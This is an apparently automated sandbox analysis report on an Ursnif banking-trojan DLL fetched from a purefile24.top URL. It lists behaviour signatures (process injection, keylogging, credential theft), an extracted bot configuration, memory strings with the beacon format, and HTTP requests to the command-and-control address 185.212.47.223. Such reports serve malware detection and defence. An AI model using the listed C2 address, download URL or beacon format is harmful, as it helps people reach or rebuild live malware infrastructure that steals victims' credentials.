Analysis Report https___purefile24.top_4352wedfoifom.php

Overview

General Information

Sample Name:	https___purefile24.top_4352wedfoifom.php (renamed file extension from php to dll)
Analysis ID:	322850
MD5:	e221c9a4b1ac13310d037cbc764b86d9
SHA1:	a7dbb7283b3b164993c1c122189e42509fe5573d
SHA256:	6b1e27915fa85d6bde40c512865e57c555e7bb02f1dc192a9b827c74c8984780
Tags:	php
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Contains VNC / remote desktop functionality (version string found)

Creates a COM Internet Explorer object

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

PE file contains strange resources

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Stores large binary data to the registry

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Classification

Signatures

AV Detection:

Found malware configuration

Source: explorer.exe.3424.30.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@computer", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "dns": "610930", "version": "250166", "uptime": "406", "crc": "59998e77", "id": "7657", "user": "4229768108f8d2d8cdc8873a875bc46d", "soft": "1"}

Multi AV Scanner detection for submitted file

Source: https___purefile24.top_4352wedfoifom.dll

ReversingLabs: Detection: 14%

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.loaddll32.exe.1110000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.loaddll32.exe.1100000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_026742B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

0_2_026742B4

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp	String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223

Source: global traffic	HTTP traffic detected: GET /images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive

Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: resolver1.opendns.com

Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000003.872503018.000000000DC64000.00000004.00000040.sdmp	String found in binary or memory: http://185.212.47.223/favicon.ico
Source: explorer.exe, 0000001E.00000003.872503018.000000000DC64000.00000004.00000040.sdmp	String found in binary or memory: http://185.212.47.223/images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F
Source: explorer.exe, 0000001E.00000003.873444020.000000000DC9A000.00000004.00000040.sdmp, explorer.exe, 0000001E.00000000.846213783.000000000A863000.00000004.00000001.sdmp	String found in binary or memory: http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/IT
Source: RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	String found in binary or memory: http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/
Source: explorer.exe, 0000001E.00000000.846213783.000000000A863000.00000004.00000001.sdmp	String found in binary or memory: http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000018.00000002.858092350.000001D7ABCB7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000025.00000003.881569101.0000000004A79000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoftjX
Source: WerFault.exe, 00000025.00000003.881569101.0000000004A79000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoftjX2E
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
